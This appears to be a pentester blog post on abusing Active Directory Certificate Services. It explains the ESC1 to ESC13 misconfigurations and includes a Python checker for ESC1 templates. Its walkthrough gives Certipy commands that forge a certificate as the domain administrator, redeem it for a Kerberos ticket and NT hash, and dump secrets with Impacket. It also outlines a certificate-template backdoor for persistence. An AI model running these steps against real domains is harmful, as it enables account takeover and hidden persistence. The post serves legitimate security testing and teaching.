Active Directory Certificate Services (AD CS) for Pentesters

Active Directory Certificate Services (AD CS) is the Windows PKI infrastructure that hands out digital certificates to people, computers, and services. It’s built to enable trust — but trust, as every good pentester knows, can be a weapon.

In this post, we’ll break down:

  • What AD CS is and why organizations use it
  • The protocols it runs on
  • How to check if it’s deployed
  • How attackers can abuse common misconfigurations
  • Real-world attack paths involving ESC1 to ESC13 (yes, that’s a thing)
  • Practical exploitation techniques and tools

AD CS is Microsoft’s Public Key Infrastructure (PKI). It allows organizations to issue digital certificates to users and machines for:

  • Smartcard logon
  • Secure email (S/MIME)
  • EFS (Encrypting File System)
  • TLS (HTTPS and RDP encryption)
  • Client authentication (Kerberos, VPN, Wi-Fi)

Instead of passwords, it gives out certificates. These certificates prove identity and are often trusted implicitly within the domain.

Under the Hood: Protocols and Components

  • HTTP/S: Web enrollment and enrollment via certsrv
  • DCOM / RPC: Backend certificate issuance and management
  • Kerberos: Authentication
  • LDAP: Storage of certificate templates and configuration in AD
  • CA (Certificate Authority): The server that issues certs
  • Certificate Templates: Define who can request what type of cert
  • Enrollment Services: Accepts requests and issues certs
  • Web Enrollment (Optional): A web UI on http://<CA>/certsrv for cert requests

If you’re inside the domain (or even partially authenticated), here’s how to hunt it down.

# PowerShell, from a domain-joined host. Enterprise CAs live in the Configuration
# partition, so point the search there; a default-scope search returns nothing.
Get-ADObject -Filter {objectClass -eq "pKIEnrollmentService"} `
    -SearchBase (Get-ADRootDSE).configurationNamingContext `
    -Properties dNSHostName, certificateTemplates

# Or use Certipy from any host that can reach LDAP on the DC
certipy find -u 'user@domain.local' -p 'Password123' -dc-ip <IP> -stdout

Or:

curl -I http://<ca-host>/certsrv/

If you get a page, or a 401 carrying WWW-Authenticate: NTLM / Negotiate headers, bingo: AD CS is active and web enrollment is exposed. (Note the host is the CA, which is usually not a domain controller, and that this endpoint is also the NTLM relay target for ESC8.)

Here’s the key point:

A certificate with an authentication EKU, issued for a user, can be exchanged for a Kerberos TGT via PKINIT. That lets you:

  • Authenticate as that user without knowing their password
  • Persist for the certificate’s whole lifetime, regardless of password changes
  • Sidestep password-based controls (lockout, password policy, password-prompted MFA), because no password is ever sent

The escalation paths are known as ESC1 to ESC13. SpecterOps (Will Schroeder and Lee Christensen, “Certified Pre-Owned”, 2021) documented ESC1 to ESC8; other researchers have since extended the numbering through ESC13. They are community names, not something Microsoft released.

ESC1 is the classic. Danger: low-priv users can enroll for certs that authenticate as someone else.

If a template:

  • Allows Domain Users (or Authenticated Users, Everyone, Domain Computers) to enroll
  • Has an authentication EKU (Client Authentication, Smart Card Logon, PKINIT Client Authentication, or Any Purpose)
  • Lets the requester supply the subject (“Supply in the request”, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
  • Does not require manager approval or an authorized signature
  • Is published by an enterprise CA

→ Any authenticated user can request a cert whose SAN names another user (including a DA) and authenticate as that user.
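Here is that checklist as code, so there is no ambiguity about which attributes matter. This is an added example, not code from the original post and not Certipy’s own implementation: it runs the ESC1 decision over constructed sample templates. The attribute names and bit values are the real ones from the AD schema and MS-CRTD (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage, the Certificate-Enrollment extended right); the Template class, the “DOMAIN” SID placeholder and the three sample templates are made up for illustration.

```python
# Added example (not from the original post, not Certipy's code): the ESC1
# decision logic as a function over certificate-template attributes, run on
# constructed sample templates. Attribute names and flag values follow the AD
# schema / MS-CRTD; the sample data and the "DOMAIN" SID placeholder are made up.
from dataclasses import dataclass

# msPKI-Certificate-Name-Flag: requester supplies the subject / SAN in the CSR
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag: request sits in "pending" until a CA manager approves it
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# pKIExtendedKeyUsage values that let a cert log on to AD (or impose no limit)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Rights in the template's nTSecurityDescriptor that allow enrollment
ENROLL_RIGHTS = {
    "0e10c968-78fb-11d1-a9c7-0000f80367c1",  # Certificate-Enrollment extended right
    "a05b8cc2-17bc-11d1-9bc2-0000f80367c1",  # Certificate-AutoEnrollment extended right
    "GenericAll",                            # full control implies enroll
}

# Principals a low-privileged attacker belongs to by default. "DOMAIN" stands in
# for the real domain SID (S-1-5-21-<a>-<b>-<c>).
LOW_PRIV_SIDS = {
    "S-1-1-0",               # Everyone
    "S-1-5-11",              # Authenticated Users
    "S-1-5-21-DOMAIN-513",   # Domain Users
    "S-1-5-21-DOMAIN-515",   # Domain Computers
}


@dataclass
class Template:
    """The handful of LDAP attributes ESC1 turns on (names as in AD)."""
    cn: str
    name_flag: int               # msPKI-Certificate-Name-Flag
    enrollment_flag: int         # msPKI-Enrollment-Flag
    ra_signature: int            # msPKI-RA-Signature (authorized signatures required)
    ekus: list[str]              # pKIExtendedKeyUsage; empty = no EKU extension at all
    aces: list[tuple[str, str]]  # (trustee SID, right) pairs from the DACL
    published_by: list[str]      # CAs whose certificateTemplates attribute lists this cn


def esc1_check(t: Template, low_priv=frozenset(LOW_PRIV_SIDS)) -> list[str]:
    """Return the ESC1 conditions that do NOT hold; an empty list means ESC1."""
    blockers = []
    if not t.published_by:
        blockers.append("not published on any enterprise CA")
    if not t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("ENROLLEE_SUPPLIES_SUBJECT not set (subject built from AD)")
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("CA certificate manager approval required")
    if t.ra_signature > 0:
        blockers.append(f"{t.ra_signature} authorized signature(s) required")
    # No EKU extension means the cert is unrestricted, so only a non-empty EKU
    # list that lacks every authentication OID rules the template out.
    if t.ekus and not AUTH_EKUS.intersection(t.ekus):
        blockers.append("no authentication-capable EKU")
    enrollers = {sid for sid, right in t.aces if right in ENROLL_RIGHTS}
    if not enrollers & low_priv:
        blockers.append("no low-privileged principal can enroll")
    return blockers


def triage(templates: list[Template]) -> dict[str, list[str]]:
    """Map template cn -> blockers; the entries with an empty list are ESC1."""
    return {t.cn: esc1_check(t) for t in templates}


# Constructed sample data: three templates as an LDAP enumeration would return them.
ENROLL = "0e10c968-78fb-11d1-a9c7-0000f80367c1"
SAMPLE_TEMPLATES = [
    # Custom "VPN" template: supply-in-request, client auth, Domain Users enroll -> ESC1
    Template("VPNUsers", 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.2"],
             [("S-1-5-21-DOMAIN-513", ENROLL)], ["corp-CA01-CA"]),
    # Stock User template: subject is built from AD, so the SAN can't be chosen
    Template("User", 0xA6000000, 0x0, 0,
             ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
             [("S-1-5-21-DOMAIN-513", ENROLL)], ["corp-CA01-CA"]),
    # Supply-in-request smart-card template, but every request needs manager approval
    Template("AdminLogon", 0x1, 0x2, 0, ["1.3.6.1.4.1.311.20.2.2"],
             [("S-1-5-11", ENROLL)], ["corp-CA01-CA"]),
]

if __name__ == "__main__":
    for cn, blockers in triage(SAMPLE_TEMPLATES).items():
        print(f"{cn:12} {'ESC1' if not blockers else 'ok: ' + '; '.join(blockers)}")
```

In a real run you would fill Template from an LDAP search of CN=Certificate Templates,CN=Public Key Services,CN=Services,<configuration NC> together with the certificateTemplates attribute of each pKIEnrollmentService object, and also confirm the CA itself grants the same principal Enroll; Certipy’s find does exactly this and reports the same conditions.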

ESC ID   Misconfiguration                                               Impact
ESC1     Low-priv enroll + auth EKU + requester supplies the subject    Impersonate any user (full domain compromise)
ESC2     Template with the Any Purpose EKU, or no EKU at all            Cert usable for client auth or as an enrollment agent
ESC3     Enrollment Agent template (Certificate Request Agent EKU)      Request certs on behalf of other users
ESC4     Dangerous ACLs on the template object                          Rewrite the template into an ESC1 template
ESC6     EDITF_ATTRIBUTESUBJECTALTNAME2 set on the CA (not a template)  Inject any UPN into the SAN on any template
ESC8     NTLM relay to the AD CS HTTP enrollment endpoints              Cert for the relayed machine or user account
ESC13    Issuance policy OID linked to a group                          Cert holder is treated as a member of that group

The rest (ESC5, ESC7, ESC9 to ESC12) cover ACLs on other PKI objects, ManageCA / ManageCertificates rights on the CA, weak certificate-to-account mapping, NTLM relay to the CA’s RPC interface, and CA keys held in a YubiHSM.

You don’t need to memorize them all. But ESC1, ESC4 and ESC8 are the ones you’ll actually hit in the wild.

Let’s walk through the tools and steps.

Use Certipy:

certipy find -u 'user@domain.local' -p 'Password123' -dc-ip <IP> -vulnerable -stdout

This will show:

  • Vulnerable templates (ESC1, ESC6, etc.)
  • If enrollment is possible
  • If certificates can be used for authentication

Once you’ve found a vulnerable template:

certipy req -u 'user@domain.local' -p 'Password123' -dc-ip <IP> -target <ca-host> -ca <ca-name> -template <template-name> -upn 'administrator@domain.local'

The -upn is the whole point of ESC1: it lands in the SAN, so the cert is issued for the user you name, not the one you enrolled as. This gives you a .pfx bundling the certificate and private key, named after the target user (administrator.pfx here).

Now authenticate with it. Certipy performs PKINIT against the DC:

certipy auth -pfx administrator.pfx -dc-ip <IP>

This gives you a Kerberos TGT in .ccache format (administrator.ccache), and Certipy also pulls the account’s NT hash through the same PKINIT exchange.

Then, with KRB5CCNAME=./administrator.ccache exported and -k -no-pass on the command line, you can use Impacket tools like:

  • smbclient.py
  • secretsdump.py
  • wmiexec.py

Target hosts by FQDN rather than IP, or the ticket won’t match a service principal name and Kerberos auth will fail. (impacket-smbserver is a server, not a Kerberos client, so it has no use for the ccache.)

If you have domain admin, or write access to a template (that’s ESC4), you can plant one:

  • Add the Client Authentication EKU
  • Turn on “Supply in the request” and turn off manager approval
  • Grant “Enroll” to a low-priv user you control
  • Request a cert for whichever account you like
  • Reuse it until it expires (validity periods of a year or more are common), even after that account’s password changes

This is stealthy persistence that doesn’t rely on passwords, tokens, or services. Only revocation or expiry cuts it off, and revocation only happens if someone notices the issuance.

AD CS is the backdoor to Active Directory that no one thinks to lock. If Kerberos is the gatekeeper, certificates are the skeleton keys.

As a pentester, mastering AD CS means:

  • Knowing when it’s in play
  • Hunting for misconfigured templates
  • Forging your way into the kingdom with a certificate and a smile
